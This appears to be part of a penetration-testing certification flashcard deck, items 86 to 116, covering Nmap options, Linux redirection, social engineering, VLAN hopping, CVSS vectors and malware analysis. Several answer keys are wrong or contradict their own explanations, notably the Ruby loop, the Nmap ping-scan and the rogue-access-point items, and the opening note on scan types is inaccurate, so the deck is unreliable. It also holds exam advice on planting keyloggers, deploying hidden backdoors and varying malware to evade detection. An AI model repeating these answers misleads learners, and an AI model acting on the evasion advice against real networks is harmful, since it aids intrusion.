The -sT switch is one of the most basic, but very good, Nmap scans. It is one of the two TCP connect scans, along with -sS (which is a stealth scan). This is a TCP scan, as it is a connection-oriented scan. Thus, it sends a connection request to the port. If it receives back an OK, it logs the port as Open. If it does not receive a response, it marks the port Closed and moves on. This scan is pretty basic, but a good and very functional scan on the network.

A stealth scan is not going to be as loud as a ping scan. You need to be very careful when performing a ping scan. A stealth scan is going to use the -sS switch and is just going to quietly poke around and see what ports are open on a host or hosts.

A discovery scan most often uses the -sn switch and will show you a list of hosts that are up, but not their ports. This type of scan is used more for seeing what is out there on the network. There are several different discovery scans you can perform, which use the following switches:

  • -sn (no port scan)
  • -sL (list scan)
  • -Pn (no ping)
  • -PS (port list, TCP version)
  • -PU (port list, UDP version)

Compliance scans, by their very nature, are interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.

86
Q

You are a Linux system administrator. You have automated a process, and you want all of the output and error logs to be recorded in a file without your intervention. Which of the following operators will you use?

A.&>
B.|
C.<
D.>

A

A.&>

Explanation:
The &> operator directs both output and error streams to a file.

In Linux, input streams provide input to programs and output streams usually print text characters to the terminal (computer monitor). You use the > or >> operators to direct output to a file. The > symbol creates a file containing the standard output. The >> symbol appends the standard output to an existing file. For example, the following command will write the echoed message to the File1 file:

$ echo "Write" > File1

The > character in the echo command above is called a file descriptor. If File1 already exists, the command will overwrite it. If you want to prevent files from being overwritten, you need to set the noclobber option of the shell:

$ set -o noclobber

The < operator redirects standard input from a file onto the screen. The following command uses the tr command to replace spaces in the File1 file with tabs, and displays the output on screen using the < operator:

$ tr ' ' '\t' < File1 | sort

A sample output of this command is as follows:

File1
File2
File3

87
Q

Northern Company is conducting an annual penetration test across its ICS/SCADA network systems. Which testing method would you use to conduct a configuration review?

A.SCADA testing
B.White box testing
C.Black box testing
D.Gray box testing

A

D.Gray box testing

Explanation:
Gray box testing provides a more focused and efficient assessment of network security. There are several types of gray box testing.

Matrix Testing: This testing technique involves defining all the variables that exist in their programs.
Regression Testing: This testing technique checks whether the change in the previous version has regressed other aspects of the program in the new version. It is done using testing strategies like retest all, retest risky use cases, and retest within a firewall.
Orthogonal Array Testing (OAT): It provides maximum code coverage with minimum test cases.
Pattern Testing: This testing is performed on the historical data of the previous system defects. Unlike black box testing, gray box testing digs within the code and determines why the failure happened.

Black box testing provides a very limited amount of information to the tester and carries a high risk that the systems can crash during the test. This type of testing is based entirely on software requirements and specifications. In black box testing, the pen tester just focuses on the inputs and outputs of the software system without bothering with internal knowledge of the software program.

White box testing is very time-consuming and expensive. It identifies as many security holes as possible. It is the testing of a software’s internal structure. Its primary focus is to verify the flow of inputs and outputs through an application, improving a design and usability, or strengthening security. It includes looking for internal security holes, broken or poorly structured paths in the coding processes, the flow of specific inputs through the code, expected output, the functionality of conditional loops, and the testing of each statement, object, and function on an individual basis.

Supervisory Control and Data Acquisition (SCADA) is not a method used for configuration review. SCADA systems are used to monitor and control a plant or equipment in industries such as telecommunications, water and waste control, energy, and oil and gas refining and transportation. They allow industrial organizations to control industrial processes locally and remotely and to monitor, gather, and process real-time information.

88
Q

Which of the following is an open-source fuzzer created by Cisco?

A.Recon-ng
B.Mutiny Fuzzing Network
C.Peach
D.AFL

A

B.Mutiny Fuzzing Network

Explanation:
Mutiny Fuzzing Framework is an open-source fuzzer created by Cisco. It functions by replaying pcaps through a mutational fuzzer.

The answer is not the American Fuzzy Lop (AFL). That is a free fuzzing tool which aims to improve the functional coverage of test cases.

The answer is not Peach. Peach is a popular fuzzer. It is open source and is available in both a community and commercial version.

The answer is not Recon-ng. It is a tool which comes with Kali Linux. It is used to automate the information gathering of Open Source Intelligence (OSINT).

89
Q

Users are reporting that a server is responding slowly and not accepting new connections. You suspect that the server is experiencing a DoS attack. Which network traffic would indicate this attack? (Choose all that apply.)

A.Excessive SYN packets
B.Malformed packets
C.Replay packets
D.Excessive ICMP ping packets

A

A.Excessive SYN packets
B.Malformed packets

Explanation:
Both malformed packets and excessive SYN packets would indicate that a denial of service (DoS) is being experienced by the server. A SYN flood attacks a victim by flooding the victim with an overwhelming number of SYN packets to saturate the connection bandwidth of the targeted system. The attacker never sends the final ACK packet, and the receiving system crashes due to the number of half-open connections.

A malformed packet is also an indication of a DoS attack because a receiving machine (especially an older one) typically has trouble handling and reassembling fragmented or malformed packets. Older machines (such as those running Windows 7) cannot reassemble malformed packets in the proper order, effectively crashing the system.

Replay packets, or a replay attack, occur when data is maliciously re-transmitted by an attacker. The attacker would need to have access to the network data. In order to do so, the attacker would need to physically tap into the network, or sit in the middle and spy (which would be considered ARP poisoning), in order to steal the victim's information.

ICMP and ping packets are related to a smurf attack, which is a form of a DoS attack. However, the indication of a DoS attack would be a large, malformed ping packet or an ICMP echo request sent to a directed broadcast address, rather than a large number of ping packets.

90
Q

Which of the following considerations is the MOST important with regards to penetration testing reports?

A.security
B.distribution
C.accuracy
D.readability

A

A.security

Explanation:
Penetration testing reports that detail the vulnerabilities that have been found could be used as an attack plan if the report fell into the wrong hands. For this reason, securing these documents is critical.

Accuracy of the reports is important, but the confidentiality of the reports is more important.

Readability is also important, especially with regard to the target audience, but the confidentiality of the reports is more important.

The distribution of the report is important in that it keeps key stakeholders updated, but the confidentiality of the reports is more important.

91
Q

You discover the following Ruby script:

a_number = 100
loop do
  a_number = a_number - 3
  next if a_number % 2 == 0
  puts "#{a_number}"
  break if a_number <= 0
end

What number will be printed first?

A.100
B.97
C.98
D.94

A

D.94

Explanation:
The number that will be printed first based on this script is 94. In this script, the variable, a_number, has a value of 100 before it enters the loop. After entering the loop, a_number decreases by 3 (97) and enters a conditional if statement.

Because a_number has a remainder when divided by 2 (48.5), it will skip the puts statement. a_number is not less than 0, so it begins the loop again by subtracting 3 from a_number. The variable now has a value of 94, which has a remainder of 0 when divided by 2.

This will cause the system to print out 94.

92
Q

A network security analyst is performing a vulnerability scan and gathering information on network hosts. They want to use ICMP traffic to determine whether a host is online and responsive. Which of the following Nmap commands would produce these results?

A.-sT
B.-sF
C.-sN
D.-sU

A

C.-sN

Explanation:
A ping scan (-sn) sends an ICMP echo request packet to the target. If the target responds with an ICMP echo reply, then it is considered alive and responsive.

A UDP scan (-sU) is used when scanning for UDP ports, for example if you are trying to enumerate a DNS, SNMP, or DHCP server.

A TCP connect scan (-sT) makes use of the underlying operating system's networking mechanism to establish a full TCP connection with the target device.

A TCP FIN scan (-sF) sets only the FIN flag on a packet. This type of scan determines if a target system’s ports are open or closed, and has the added benefit of being stealthier than a TCP connect scan.

93
Q

At InterConn, you ran an Nmap scan. In that scan you discover vsftpd running.

You run a Metasploit scanner, which returns the following results:

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary (scanner/ftp/anonymous) > set RHOSTS 172.16.16.20
RHOSTS => 172.16.16.20
msf auxiliary (scanner/ftp/anonymous) > exploit
[+] 172.16.16.20:21 - 172.16.16.20:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution complete

What options below would you recommend as BEST PRACTICES that InterConn should do to fix this vulnerability? (Choose all that apply.)

A.Require re-authentication of inactive sessions
B.Lock down administration accounts
C.Use strong passwords and multi-factor authentication
D.Encrypt all files stored in the FTP server
E.Return any modified systems and their configuration to their original values and parameters
F.Restrict administrator privileges to a limited number of users and require them to use multifactor authentication

A

A.Require re-authentication of inactive sessions
B.Lock down administration accounts
C.Use strong passwords and multi-factor authentication
D.Encrypt all files stored in the FTP server
F.Restrict administrator privileges to a limited number of users and require them to use multifactor authentication

Explanation:
The following answers are best practices to lock down your FTP server:

Use strong passwords and multi-factor authentication. A best practice is to use good credential management and strong passwords. When possible, use two-factor authentication for any critical service or server.
Encrypt all files stored in the FTP server. If someone does get in, it is more work to find out what is in there.
Require re-authentication of inactive sessions. Believe it or not, you can sometimes bring back “closed sessions” that weren’t logged out of as you thought. You can do this in web browsers on public computers as well. Please make sure you log out of Facebook on a public computer!
Lock down administration accounts. You should restrict administrator privileges to a limited number of users and require them to use multi-factor authentication. In addition, do not use common administrator usernames such as root or admin.

Returning any modified systems and their configuration to their original values and parameters may sound correct, but you actually want to patch and modify your parameters in an FTP server to keep cyber criminals out. Leaving things in a default setting is what let the anonymous login happen in the first place.

94
Q

Which of the following is NOT a major concern with IoT device updates?

A.Hashed update files
B.Unsigned updates
C.Updates sent encrypted
D.Lack of update mechanism

A

A.Hashed update files

Explanation:
Hashing an update file is actually a way to ensure and prove that updates come from a reliable, trusted source. The device manufacturer will provide the update along with a hash of the file. Before installing the update, the receiving party will validate the update file by comparing hashes.

The other choices are major concerns that prevent updates from being installed properly or may lead to fake, malicious files being downloaded.

95
Q

During a pen test, one of the testers convinced a user that they were calling from the police and needed immediate access to their email account and that failure to do so could implicate them in a crime.

Which techniques were used to accomplish this? (Choose two.)

A.scarcity
B.fear
C.authority
D.social proof
E.urgency
A

B.fear
C.authority

Explanation:
The two techniques that were used are authority (pretending to be police) and fear (threat of implication). When faced with these techniques, users will often forget all training and cooperate.

The technique of scarcity was not used. An example of this would be to tell someone that there are a limited number of users who can be a part of a test group. It works because people do not like to feel as though they missed an opportunity for something free.

The technique of social proof was not used. This technique leverages the “follow the herd” mentality. For example, a hacker might say that several coworkers have already responded favorably to the hacker, leading the user to assume that MUST be the appropriate response.

The technique of urgency was not used. If the hacker added that the user had 15 minutes to respond, then urgency would have been used.

96
Q

What tool was primarily designed to brute force both directory and file names on web application servers?

A.W3AF
B.Nikto
C.OWASP ZAP
D.Nessus

A

C.OWASP ZAP

Explanation:
OWASP ZAP is correct. Originally, DirBuster was primarily designed to brute force both directory and file names on web application servers. However, it is an inactive project and has been integrated into OWASP ZAP.

The answer is not Nikto. Nikto is an open source web vulnerability scanner.

The answer is not Nessus. Nessus is a vulnerability scanner developed by Tenable. It has many features compared to other scanners, including continuous monitoring and compliance analysis.

The answer is not W3AF. W3AF is a web application vulnerability scanner. It is open source and has many available plugins.

97
Q

As a pen tester, covering your tracks is as important, maybe more, than lateral movement in the post-exploitation process. Which of the following should you NOT do to cover your tracks?

A.You should vary your malware on the network.
B.You should secretly deploy backdoors.
C.You should infect most of the hosts on the company’s network to hide your movement.
D.You should use a VPN to facilitate bypassing some network monitoring.

A

C.You should infect most of the hosts on the company’s network to hide your movement.

Explanation:
You should NOT infect most of the hosts on the company’s network to hide your movement. If you do that, your presence will be put out in the open. If you only infect a few hosts and keep them updated, then the intrusion detection systems (IDSs) may not detect your presence, and it will be harder for incident response to deal with it.

You should deploy backdoors to allow you persistence in some of the hosts. As long as they are hidden or encrypted, then your tracks are covered, and you do not have to re-hack your way back in to the network.

You should vary your malware on the network. Having a massive malware dump of the same kind with the same signature will set off enterprise alerts. If you have a few, varied malware on the systems, it can throw off incident response.

You should use a VPN to facilitate bypassing some network monitoring. Of course, you should hide your IP address to eliminate fingers being pointed back to you. Most VPNs can be double servers, or Peer-to-Peer (P2P) encrypted. Peer-to-peer encryption creates a file-sharing (i.e. torrent) network between hosts.

98
Q

As part of a penetration test, you aim to evade antivirus checks that the target organization has put in place. Which of the following frameworks would you use?

A.W3AF
B.Nikto
C.Tor
D.Veil

A

D.Veil

Explanation:
Veil is a Metasploit framework typically used to evade both security controls and antivirus.

Tor (The Onion Router) is a tool which allows for the user to browse the internet anonymously. It does this by routing IP traffic through an expansive network of Tor relays, constantly changing the way it routes this traffic. This in turn obscures the user’s location and makes it extremely difficult to trace traffic back to the user.

Nikto is an open-source web vulnerability scanner.

W3AF is a web application vulnerability scanner. It is open source and has many available plugins.

99
Q

You are doing a penetration test for InterConn, and in your reconnaissance, you find their website with a front-facing web application. It seems like their input fields are not filtered. Which attack method is the BEST one to use in this scenario?

A.SQL injection
B.Brute force
C.DDoS
D.XSS

A

A.SQL injection

Explanation:
The best attack to use in this scenario is SQL injection. SQL injection could allow you access to the database for usernames, emails, and passwords. Therefore, it is the BEST option in this scenario. You need to attack the site, not the clients that use the site, so a SQL injection would make the most sense as it attacks the server and not the clients.

A cross-site scripting (XSS) would not be the best in this scenario. In XSS attacks, hackers exploit input and scripting vulnerabilities to launch a malicious script on the client-side browser. XSS includes stored, reflected, and DOM-based attacks.

Brute force would not be the best in this scenario. Brute force is a password cracking technique that tries every possible combination of characters repeatedly to guess a password. This technique is the most efficient when the hacker has already gained information, like children’s and pet names, car models, and street addresses, from social engineering.

The scenario would not be a good candidate for a Distributed Denial of Service (DDoS) or a DoS attack. A DoS attack occurs when a target's resources or network bandwidth are flooded with the intent of making the target unresponsive. DDoS is a variant of DoS, where multiple systems, known as zombies, bots, or drones, flood the target as a single botnet, so as to bring down the system more efficiently and anonymously. DDoS would make InterConn's site go down, not give us access to the devices.

100
Q

You have been hired to conduct a pentest of an organization. What would be a correct way to scan the HTTP port of the given host using the most aggressive timing template?

A.nmap -p80 -T5 10.10.10.10/24
B.nmap -p 443 -T1 10.10.10.10/24
C.nmap -sS443 -T5 10.10.10.10/24
D.nmap -sS80 -T0 10.10.10.10/24

A

A.nmap -p80 -T5 10.10.10.10/24

Explanation:
The command nmap -p80 -T5 10.10.10.10/24 is the correct way to select the HTTP port in an Nmap scan. The parameter -T5 is the most aggressive timing template. Timing templates are specified with the -T option and range from 0 through 5. The parameter -T0 takes the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. The parameter -T5 is much quicker, but is very likely to set off IDS alerts.

Therefore, the correct way to select a port is by using -p followed immediately by the port number (for example, -p80). There is no space between the option and the port number. The following exhibit shows an example of this command:

The -p 443 parameter is not the correct way to specify a port scan because there is a space between the -p and the number. In addition, port 443 is used by HTTPS, not HTTP.

The -sS parameter of the Nmap command performs a SYN scan. It is not used for port selection. The following exhibit shows the output of this parameter:

101
Q

You have physical access to a network administrator’s computer. What are some ways you can drop a keylogger onto their computer? (Choose all that apply.)

A.Connect it to the USB drive on the back of the computer.
B.Use a USB cable attachment that runs to the keyboard.
C.Plug it directly into the keyboard.
D.Implement an acoustic keylogger.
E.Swap out the keyboard for a bugged one

A

A.Connect it to the USB drive on the back of the computer.
B.Use a USB cable attachment that runs to the keyboard.
D.Implement an acoustic keylogger.
E.Swap out the keyboard for a bugged one

102
Q

Recently a sensitive server was reached on what should have been a secure VLAN. It was accomplished by using VLAN hopping.

Which of the following is a defense against VLAN hopping?

A.Implement DAI.
B.Disable the use of CDP.
C.Disable the use of DTP.
D.Implement DHCP snooping.

A

C.Disable the use of DTP.

Explanation:
You would disable the use of DTP. Dynamic Trunking Protocol (DTP) is a now discredited protocol that in the past was used to automatically negotiate the creation of a trunk link between two switches. Trunk links are able to carry the traffic of multiple VLANs. If a user is able to use the protocol to negotiate a trunk link between their device and the switch, they would be able to receive the traffic from VLANs to which they should not have access. It is a best practice to disable DTP on switch ports to prevent this form of VLAN hopping.

Disabling Cisco Discovery Protocol (CDP) can prevent gathering information about Cisco devices that is contained in CDP packets, but will not prevent VLAN hopping.

Implementing DHCP snooping allows the switch to see all DHCP traffic and record the IP address-to-MAC address mappings. DHCP snooping can also be used to block rogue DHCP servers by permitting DHCP server traffic only on the port where the legitimate DHCP server is located. It will not prevent VLAN hopping attacks.

Dynamic ARP Inspection (DAI), when configured, allows the switch to utilize the mappings created by DHCP snooping to check all ARP messages and to disallow any ARP changes that deviate from the DHCP mappings. This can help prevent ARP poisoning, but will not stop VLAN hopping.

103
Q

You are working for a contracting company that was employed by the federal government. Which organization’s publications are likely to be most closely related to your security compliance standards?

A.NIST
B.US-CERT
C.JPCERT
D.CVE

A

A.NIST

Explanation:
The National Institute of Standards and Technology (NIST) is an agency of the U.S. Department of Commerce. Its main focus is to promote innovation and to assist organizations in assessing the risks they encounter. Its publications will be most closely related to your security compliance standards.

Japan Computer Emergency Response Team (JPCERT) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. They also gather and disseminate technical information on computer security incidents and vulnerabilities and security fixes, and other security information, as well as issue alerts and warnings.

The U.S. Computer Emergency Readiness Team (US-CERT) is an organization that was established by the U.S. Department of Homeland Security to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. However, they do not provide security compliance standards.

Common Vulnerabilities and Exposures (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, it is more of a dictionary than a database. CVE helps provide rankings on discovered vulnerabilities, but does not provide security compliance standards.

104
Q

Which of the following entities would most likely require an attestation of findings after the completion of a penetration test? (Choose all that apply.)

A.regulatory agency
B.competitor
C.federal, state, or local government
D.partner

A

A.regulatory agency
C.federal, state, or local government
D.partner

Explanation:
An attestation of findings after the completion of a penetration test is most likely required by the following entities:

Partners
Federal, state, or local government
Regulatory agencies

Partner contracts may contain stipulations regarding security and penetration tests. As a result, organizations may need an attestation of findings for compliance.

Federal, state, or local governmental regulations or regulatory agencies may require an organization to provide (or keep on hand) an attestation of findings to demonstrate compliance.

105
Q

After all your scans and tests, you must determine if a vulnerability is exploitable. First you need to identify an exploit for the vulnerability. Then you must prioritize your vulnerabilities. Standard protocol would have you start with the highest-severity vulnerabilities that have the greatest likelihood of being exploited.

Which of the following would you use to prioritize your vulnerabilities/exploits by the highest severity? (Choose three.)

A.The CVSS V2 database says it has a 9.0 base score or higher.
B.It was found via a mass vulnerability scan.
C.It has a matching module in the Metasploit framework.
D.It is not on a critical server, but is being actively exploited.

A

A.The CVSS V2 database says it has a 9.0 base score or higher.
C.It has a matching module in the Metasploit framework.
D.It is not on a critical server, but is being actively exploited.

Explanation:
As a general rule, if a vulnerability has a matching module in Metasploit, it should almost always be considered high severity. That means that it has been out for long enough and has been seen in enough hacking attempts for someone to have created a module for it.

Also, if you run across an exploit that is alive and being actively exploited, another general rule of thumb is to tell your client immediately. There may be confidential information leaking out to the hackers.

CVSS is the Common Vulnerability Scoring System, which is an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10. Level 9 in both the CVSS V2 and V3 rating is severe. Please fix these issues immediately.

The mass vulnerability scan findings are not a high-priority finding. Those must be vetted to make sure they are not a false positive.

106
Q

One of the pen testers was successful in cloning the company’s AP, jamming the frequency on which the company’s AP operates and causing several clients to associate with the fake AP. The users have a preconfigured WLAN profile that specifies the proper SSID, and for user convenience, also specifies their WLAN credentials.

What type of attack is MOST LIKELY being conducted?

A.fragmentation attack
B.credential harvesting
C.deauthentication attack
D.KARMA attack

A

D.KARMA attack

Explanation:
The most likely attack is credential harvesting. When the AP’s operating frequency is jammed, it causes all stations to disconnect from the AP. Then the stations will do as they are designed and will seek another AP with the same SSID. When they locate the fake AP, they will send probe requests. The probe requests will include the credentials specified in the scenario, which can then be harvested.

It is not likely to be a fragmentation attack. A wireless fragmentation attack is designed to capture elements of the pseudo-random generation algorithm (PRGA) and does not include the use of a fake AP.

It is not likely to be a deauthentication attack. That is a DoS attack in which the tester or hacker sends deauthentication frames, which causes stations to disconnect from the AP and making wireless communication impossible.

It is not likely to be a KARMA attack. In a Karma Attacks Radioed Machines Automatically (KARMA) attack, the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station, complete with credentials, that stations attempt to locate with probe requests at all times when they are not associated with an AP.

107
Q

While practicing your basic commands before a white box penetration test, you type the following:

$ echo "There is  a   lot     of       space           here"

What will be the output?
A.None of these
B.Thereisalotofspacehere
C.There is  a   lot     of       space           here
D.There is a lot of space here
A

C.There is  a   lot     of       space           here

Explanation:
Using the quotes on the string in the echo command will result in that string being echoed exactly as specified. In this case the output will be:

There is  a   lot     of       space           here

If you do not use the quotes, as shown in the following example, the echo command automatically trims extra spaces between words:

$ echo There is  a   lot     of       space           here

The output from that command would be:

There is a lot of space here

108
Q

You are performing a pen test and would like to determine if the LLMNR service is disabled as policy specifies.

Which Windows registry key on each device can be reviewed for the proper setting?

A.HKLM\SYSTEM\Policies\Microsoft\Windows NT\Parameters
B.HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\
C.HKLM\Software\Policies\Microsoft\Windows NT\DNSClient
D.HKLM\Security\Policies\Microsoft\Windows NT\DNSClient

A

C.HKLM\Software\Policies\Microsoft\Windows NT\DNSClient

Explanation:
The registry key to check if the LLMNR service is disabled is located at HKLM\Software\Policies\Microsoft\Windows NT\DNSClient, as shown in the exhibit below, using the registry editor. If the value is set to 0, Link-Local Multicast Name Resolution (LLMNR) is disabled.

The key is not located at HKEY_CURRENT_USER\Control Panel\Desktop. This controls settings such as MenuShowDelay, which can be used to speed up the appearance of the Start menu.

The key is not located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion. These settings control behavior during an update, such as the Uninstall setting. If you have had a problem uninstalling a program – for example, if the uninstall has gone wrong or you have simply deleted it – you may still see it listed in the Uninstall or change a program list in the Control Panel. This setting, when deleted, will stop that behavior.

The key is not located at HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces. At that location, NetBIOS, another vulnerable name resolution service, can be disabled. To disable it, the DWORD value for NetbiosOptions should be changed to 2 as shown below:

Value 0 keeps the default setting, which is to use the NetBIOS settings from the DHCP server, whilst setting this value as 1 enables NetBIOS over TCP/IP.

109
Q

You teach a Linux course and have a large list of students enrolled in the course. After registration is complete, you need to sort the list of names alphabetically using commands on the Linux shell. You need a way to connect your output command with your sorting command.

Which of the following will you use to accomplish this task?

A.pipe operator (|)
B.split
C.cat
D.redirection operator(>)

A

A.pipe operator (|)

Explanation:
You should use the pipe operator (|) to connect your output command with your sorting command.

The pipe operator (|) allows you to connect commands. The following command feeds the given text (three names) into the sort command:

$ echo -e "Carla\nArthur\nBrian" | sort

The output of that command would be as follows:

Arthur
Brian
Carla

There are many filters available to use on text streams to get a desired result.

The redirection operator (>) allows you to save the output of a command to a file, as shown in the following command:

$ echo "These are the contents of the file named echofile" > echofile

The cat command (short for concatenate) allows you to display the contents of a file on the standard output (stdout). The following example would display the contents of the echofile file:

$ cat echofile

The split command cuts an input into fixed-size pieces and writes them to a set of output files. Its options let you control how the input is cut, or split, into those separate files.

110
Q

Which of the following is MOST likely to be affected by the Wassenaar Arrangement?

A.The tools that can be used to perform the pen test
B.The permitted locations for pen testing to occur
C.The permitted time periods in which pen testing can occur
D.The identity of the individuals who can perform the pen test

A

A.The tools that can be used to perform the pen test

Explanation:

The Wassenaar Arrangement was established for export control of conventional arms and dual-use (civilian/military) goods and technologies. Some of the tools used in pen testing might incorporate technologies that may not be allowed to be used in the country where the organization undergoing the test is headquartered or located.

These types of export restrictions cover technologies and products and do not address issues such as the identity of the tester, the permitted locations, or time periods.

111
Q

A security analyst was provided with a detailed penetration report, which was performed against the organization’s resources. It was noted on the report that a vulnerability on a file server has the following detailed CVSS 3.1 vector:

CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

Which metric group in this vector should be of the highest concern to the security analyst?

A.Attack Vector
B.Integrity
C.Confidentiality
D.Availability

A

C.Confidentiality

Explanation:
The security analyst should be most concerned with the Confidentiality or C metric group because that metric group is rated as H or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.

The Integrity metric group is rated at L or Low. This means modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. This is not as high as the C rating.

The Availability metric group is rated at N or None, meaning that there is no impact to availability within the impacted component.

The Attack Vector metric group is rated P or Physical, meaning that the attack requires the attacker to physically touch or manipulate the vulnerable component.

112
Q

Which of the following is NOT an important factor in creating the communication escalation path?

A.stakeholder team structure
B.secure communication protocols
C.communication schedule
D.contact information for all stakeholders

A

A.stakeholder team structure

Explanation:
A proper communication escalation path identifies who the tester should contact, how often contact can be made, and under what conditions the stakeholders should be contacted. It also includes their contact information. Specifically, it should include:

Contact information for all relevant stakeholders
Frequency of communication with the stakeholders
Method of communication with the stakeholders
Individuals to contact in case of emergency

The internal team structure for stakeholders is not typically used in the process of creating a communication escalation path.

113
Q

Your organization has become aware of issues with technology products that contain security issues out of the box, such as backdoors. You have been hired to perform a pen test of a product provided by a specific vendor. What type of assessment are you performing?

A.goals-based
B.objective-based
C.supply chain
D.compliance

A

C.supply chain

Explanation:
A supply chain assessment is used to verify that all software and hardware that was not developed by the organization, but by third parties, is free of vulnerabilities.

In goals-based or objective-based assessments, the company and the penetration tester agree on a specific goal or outcome.

Organizations that are regulated by laws such as HIPAA, PCI-DSS and other legislation typically perform a compliance-based assessment. In this type of assessment, all efforts are made to verify compliance with the requirements of the regulations. However, some compliance-based assessments are performed to verify that organizations are in compliance with their own corporate policies.

114
Q

A penetration tester identifies the following findings during an external vulnerability scan:

Vulnerability	Ports
Unencrypted authentication	20
Unencrypted data	21
SSLv3 accepted on HTTPS connections	443
Windows Server 2012 host found	21

Which is the BEST answer for these findings?

A.FTP server configurations may reveal sensitive information.
B.Weak authentication practices may be used.
C.Identical credentials are used on multiple systems.
D.Obsolete software may contain exploitable components.

A

A.FTP server configurations may reveal sensitive information.

Explanation:
Based on the findings, FTP server configuration may reveal sensitive information. By default, FTP uses ports 20 and 21 and is not encrypted. This means that both authentication and data can be intercepted.

Obsolete software with exploitable components is not the main problem. None of the findings shown list software that is no longer supported. Windows Server 2012 is supported until October 2023, as of this writing.

Weak authentication practices are not the main problem. FTP sends authentication information in plaintext. The problem is not the authentication mechanism, but rather the use of FTP itself.

Identical credentials being used on multiple systems is not the main problem. None of the given findings relate to this issue. Identical credentials would allow an attacker to use the same credentials across multiple systems.

FTP can be run over SSL/TLS (FTPS) to provide encryption for both authentication and data. This would prevent attackers from being able to read the information transmitted.

115
Q

Users have been complaining about a program constantly crashing. What tool would you use to find out more information as to why the crashes occur?

A.Immunity Debugger
B.BeEF
C.GDB
D.Theharvester

A

C.GDB

Explanation:
The GNU Project Debugger (GDB) is a widely popular debugger with many features. With this program, you can understand what a program was doing when it crashed.

The answer is not BeEF. BeEF is a web application testing framework. Its main purpose is to exploit vulnerabilities in web browsers.

The answer is not the Immunity Debugger. This tool supports a Python-based API. It allows for the writing of exploits, analysis of malware, and reverse engineering of binary files.

The answer is not Theharvester. It is a tool used to enumerate DNS information about a given hostname or IP address.

116
Q

An incident responder discovers the following code that has infected an IoT device:

Killer_kill_by_port (htons(23))

What can the incident responder conclude from inspecting the code?

A.The malware is attempting to kill the SSH service and prevent it from restarting.
B.The malware is attempting to eradicate other botnet processes.
C.The malware is carrying out a GRE flood.
D.The malware is attempting to kill the Telnet service and prevent it from restarting.

A

D.The malware is attempting to kill the Telnet service and prevent it from restarting.

Explanation:
Killer_kill_by_port (htons(23)) tries to kill processes running Telnet. This code is part of advanced malware (such as Mirai, which targeted Dyn servers in 2016) that is designed to find and infect IoT devices. After infection, the devices become a launch pad for DDoS attacks. The specific kill process is a way for the code to protect itself. It would kill other processes running SSH, Telnet, and HTTP to prevent the owner from gaining remote access to the IoT device while it is infected.

While the malware would also kill processes running SSH, the highlighted code kills port 23 (not port 22). Port 23 is used by Telnet.

While this specific line of code is not responsible, malware can also locate and eradicate other botnet processes from memory, a process known as memory scraping.

While this specific line of code is not responsible, malware can also launch different types of attacks, such as a GRE flood, where inbound traffic is designed to look like it is generic routing encapsulation (GRE) data packets. GRE is a communication protocol used to establish a direct, point-to-point connection between network nodes.

There are a total of 65,535 ports in the TCP/IP protocol suite, any of which can be targeted by attacks. You should know the following commonly used ports and protocols.

    FTP - ports 20 and 21
    SSH, SCP, and SFTP - port 22
    Telnet - port 23
    SMTP - port 25
    TACACS - port 49
    DNS server - port 53
    DHCP - ports 67 and 68
    TFTP - port 69
    HTTP - port 80
    Kerberos - port 88
    POP3 - port 110
    NetBIOS - ports 137-139
    IMAP4 - port 143
    SNMP - port 161
    LDAP - port 389
    SSL and HTTPS - port 443
    SMB - port 445
    LDAP with SSL - port 636
    FTPS - ports 989 and 990
    Microsoft SQL Server - port 1433
    Point-to-Point Tunneling Protocol (PPTP) - port 1723
    RDP and Terminal Services - port 3389